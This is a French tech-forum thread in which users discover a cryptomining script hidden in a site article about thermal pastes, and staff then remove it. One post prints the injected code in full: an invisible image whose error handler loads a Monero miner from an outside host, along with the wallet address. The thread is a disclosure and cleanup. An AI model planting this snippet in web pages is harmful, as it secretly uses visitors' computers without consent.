EN DIRECT en ligne connexion / inscription
Connexion

Surnom/Pseudo
Mot de Passe :

[ Vous avez perdu votre mot de pass ? | Devenir membre ]

×

Infection de page web sur le test des pâtes thermiques , page 2

Aller à la page :   1234  
CowcotLand topic RSS feed Surveiller les réponses de ce sujet
CeltiGDL @
Saisonnier
Saisonnier

46pts

Inscrit le: 22 avril 2020
Messages: 26

Navigateur : n.c.

Hors ligne
Message Posté le: 01 août 2021 à 01:44  Lien permanent
Répondre en citant
Idem, signalé avec Kaspersky
Voir le profil de l'utilisateur Envoyer un message privé
hyperman @
Agriculteur
Agriculteur

2229pts

Inscrit le: 28 juin 2014
Messages: 690
Localisation: juste derriere toi...
Navigateur : Firefox

Hors ligne
Message Posté le: 01 août 2021 à 04:24  Lien permanent
Répondre en citant
alors truc tres rigolo, je confirme qu'il se passe bien quelque chose Mort de rire

quand je lance la page "Comparatif de pâtes thermiques : 9 modèles testés" et que je la laisse ouverte, mon CPU passe a 100% sur le gestionnaire des taches (par firefox), quand je la coupe, ca repasse a 4,5%

y'a definitivement un truc, et qu'est pas detecté XD

cowcot faut faire quelque chose la, ca craint grave :')


firefox, antivir win10

EDIT : faudrait ptete enlever le "suspicion" du texte... y'a bien un truc


Plus le PC est tout potit, plus il est meugnon
Voir le profil de l'utilisateur Envoyer un message privé
Karlitos @
Ouvrier agricole
Ouvrier agricole

254pts

Inscrit le: 15 décembre 2019
Messages: 173

Navigateur : n.c.

Hors ligne
Message Posté le: 01 août 2021 à 07:26  Lien permanent
Répondre en citant
Oui je confirme même constant cpu à 100% sur cette page !
Voir le profil de l'utilisateur Envoyer un message privé
OMGimag33k @
Métayer
Métayer

3286pts

Inscrit le: 25 septembre 2018
Messages: 1507

Navigateur : n.c.

Hors ligne
Message Posté le: 01 août 2021 à 13:04  Lien permanent
Répondre en citant
+1, le script de cloud miner est bien présent...

Après avoir établi une connexion directe sur le serveur ccl en retirant la mise en cache du CDN, voici le véritable code source du script:

Code:
<img itemprop="image" src=x style="display: none;" onerror="
var x=document.createElement('script'); x.setAttribute('src', 'https://cloud-miner.de/tkefrep/tkefrep.js?tkefrep=bs?nosaj=faster.moneroocean'); document.body.appendChild(x);
window.onload = function() { EverythingIsLife('86QXuVdWxRKHU3RKQnnit1J3ZrJd4n62SLTkyZhT5upULX2Ky6oF2WL6CMVZK448FM6vowu1Ry3c3NNsHuJpgATvG4ovNYv', 'ccl', 20); };


Le script est donc intégré discrètement sous la forme d'une image.

Le script est spécifique à cet article, j'ai regardé vite fait dans d'autres articles et il n'y était pas (il faudrait vérifier directement en bdd pour voir si le script est présent ailleurs).

Cela dit, le script est présent depuis la mise en ligne de l'article: http://web.archive.org/web/20200428173923/https://www.cowcotland.com/articles/2951/comparatif-de-pates-thermiques-9-modeles-testes.html Il semble donc qu'il ait bien été inséré volontairement par l'auteur... Roulement des yeux

Dans le code source, on voit le nom du pool et son adresse. On peut donc se rendre ici: https://moneroocean.stream/ et rentrer l'adresse
Code:
86QXuVdWxRKHU3RKQnnit1J3ZrJd4n62SLTkyZhT5upULX2Ky6oF2WL6CMVZK448FM6vowu1Ry3c3NNsHuJpgATvG4ovNYv
pour avoir pas mal d'infos:



On voit bien que le mineur a été appelé "ccl", ce n'est pas le fait d'un hack, c'est volontaire... Roulement des yeux


Voir le profil de l'utilisateur Envoyer un message privé » Album Photos
Zoom @
Métayer
Métayer

4638pts

Inscrit le: 11 février 2019
Messages: 1699

Navigateur : Firefox

Hors ligne
Message Posté le: 01 août 2021 à 13:13  Lien permanent
Répondre en citant
4 centimes par an 👌
Voir le profil de l'utilisateur Envoyer un message privé
Le_dodo @
Ouvrier agricole
Ouvrier agricole

484pts

Inscrit le: 16 décembre 2020
Age: 42
Messages: 287
Localisation: 25 rue de la grange au loup
Navigateur : Edge

Hors ligne
Message Posté le: 01 août 2021 à 14:42  Lien permanent
Répondre en citant
OMGimag33k a écrit:
+1, le script de cloud miner est bien présent...
On voit bien que le mineur a été appelé "ccl", ce n'est pas le fait d'un hack, c'est volontaire... Roulement des yeux

J'ai rien compris pour ce qui est de la partie technique, mais c'est franchement dégeulasse d'utiliser les ressources des autres sans leur demander !
Voir le profil de l'utilisateur Envoyer un message privé
topodoco @
Paysan
Paysan

639pts

Inscrit le: 29 juillet 2008
Messages: 361

Navigateur : n.c.

Hors ligne
Message Posté le: 01 août 2021 à 15:09  Lien permanent
Répondre en citant
Est-ce que le script s'active en permanence ou uniquement si un bloqueur de pub est détecté ?
Comme ça, ça a l'air dégueulasse, mais si ça permet de dégager les pubs, je crois que c'est une solution qui ne me déplairait pas tant que ça...


Voir le profil de l'utilisateur Envoyer un message privé
t0t0 @
Saisonnier
Saisonnier

196pts

Inscrit le: 11 décembre 2016
Messages: 81

Navigateur : n.c.

Hors ligne
Message Posté le: 01 août 2021 à 15:29  Lien permanent
Répondre en citant
Il n'y a pas moyen de mettre en place un Content-Security-Policy pour bloquer ce genre de choses ?
Voir le profil de l'utilisateur Envoyer un message privé » Album Photos
bishop28 @
Métayer
Métayer

4170pts

Inscrit le: 06 octobre 2010
Age: 43
Messages: 2538
Localisation: FRANCE bonneval
Navigateur : n.c.

En ligne
Message Posté le: 01 août 2021 à 15:51  Lien permanent
Répondre en citant
topodoco a écrit:
Est-ce que le script s'active en permanence ou uniquement si un bloqueur de pub est détecté ?
Comme ça, ça a l'air dégueulasse, mais si ça permet de dégager les pubs, je crois que c'est une solution qui ne me déplairait pas tant que ça...


Avec un anti pub, le script ne se lance pas, sans il se lance.

Sans :
Mon image

Avec :
Mon image


Vous vous moquez de moi parce que je suis différent, je me moque de vous parce que vous êtes tous pareil.
Voir le profil de l'utilisateur Envoyer un message privé » Album Photos » Google Map
mantidor @
Boss
Boss

15327pts

Inscrit le: 24 novembre 2003
Messages: 2792
Localisation: Niort enfin presque
Navigateur : n.c.

Hors ligne
Message Posté le: 01 août 2021 à 15:51  Lien permanent
Répondre en citant
mias c'est quoi ce truc


Le PC est une petite machine servant à faire enrager les femmes Clin d'oeil
Voir le profil de l'utilisateur Envoyer un message privé » Album Photos » Google Map
mantidor @
Boss
Boss

15327pts

Inscrit le: 24 novembre 2003
Messages: 2792
Localisation: Niort enfin presque
Navigateur : n.c.

Hors ligne
Message Posté le: 01 août 2021 à 15:55  Lien permanent
Répondre en citant
il y a bien le code en code source, je le vire de suite


Le PC est une petite machine servant à faire enrager les femmes Clin d'oeil
Voir le profil de l'utilisateur Envoyer un message privé » Album Photos » Google Map
mantidor @
Boss
Boss

15327pts

Inscrit le: 24 novembre 2003
Messages: 2792
Localisation: Niort enfin presque
Navigateur : n.c.

Hors ligne
Message Posté le: 01 août 2021 à 15:57  Lien permanent
Répondre en citant
C'était ca le code, comme tu l'avais noté


Le PC est une petite machine servant à faire enrager les femmes Clin d'oeil

Dernière édition par mantidor le 02 août 2021 à 07:33; édité 1 fois
Voir le profil de l'utilisateur Envoyer un message privé » Album Photos » Google Map
bishop28 @
Métayer
Métayer

4170pts

Inscrit le: 06 octobre 2010
Age: 43
Messages: 2538
Localisation: FRANCE bonneval
Navigateur : n.c.

En ligne
Message Posté le: 01 août 2021 à 15:59  Lien permanent
Répondre en citant
C'est bon de mon côté, il ne se lance plus sans anti pub.


Vous vous moquez de moi parce que je suis différent, je me moque de vous parce que vous êtes tous pareil.
Voir le profil de l'utilisateur Envoyer un message privé » Album Photos » Google Map
mantidor @
Boss
Boss

15327pts

Inscrit le: 24 novembre 2003
Messages: 2792
Localisation: Niort enfin presque
Navigateur : n.c.

Hors ligne
Message Posté le: 01 août 2021 à 16:01  Lien permanent
Répondre en citant
Franchement ne vois pas d'ou cela vient et en plus faire miner des CPU, bonjour l'inefficaté

On va enquêter.


Le PC est une petite machine servant à faire enrager les femmes Clin d'oeil
Voir le profil de l'utilisateur Envoyer un message privé » Album Photos » Google Map
eldran64 @
Cowcot Team
Cowcot Team

20140pts

Inscrit le: 30 juin 2009
Age: 38
Messages: 7442
Localisation: En Bretagne
Navigateur : Edge

Hors ligne
Message Posté le: 01 août 2021 à 16:23  Lien permanent
Répondre en citant
mantidor a écrit:
Franchement ne vois pas d'ou cela vient et en plus faire miner des CPU, bonjour l'inefficaté

On va enquêter.


Depuis ta réponse, j'ai ce souci sur ce topic aussi ☹


AMD Ryzen 9 7950X3D, ASUS ROG CROSSHAIR X670E HERO, EVGA GeForce RTX 3090 XC3 ULTRA GAMING
Voir le profil de l'utilisateur Envoyer un message privé » Album Photos » Google Map
Aller à la page :   1234  
Sauter vers: 
Surveiller les réponses de ce sujet CowcotLand topic RSS feed  

Vous ne pouvez pas poster de nouveaux sujets dans ce forum
Vous ne pouvez pas répondre aux sujets dans ce forum
Vous ne pouvez pas éditer vos messages dans ce forum
Vous ne pouvez pas supprimer vos messages dans ce forum
Vous ne pouvez pas voter dans les sondages de ce forum


Sujets similaires

Sujet Auteur Forum Réponses Posté le
Pas de nouveau message Test Razer BlackShark V2 HyperSpeed : un nouveau sans-fau... JMC Audios 0 19 mars 2024 à 13:17
Pas de nouveau message Test Aiyima DAC A2 Pro : DAC et hub USB en même temps ! JMC Audios 0 15 mars 2024 à 10:54
Pas de nouveau message Test SSD externe KINGSTON XS1000 : 1050 Mo/sec en lecture... mantidor SSD 0 14 mars 2024 à 09:45
Pas de nouveau message Test carte mère : MSI X670E CARBON WIFI, vraiment trop ch... SebastienD CPU, Cartes mères, RAM 0 08 mars 2024 à 13:52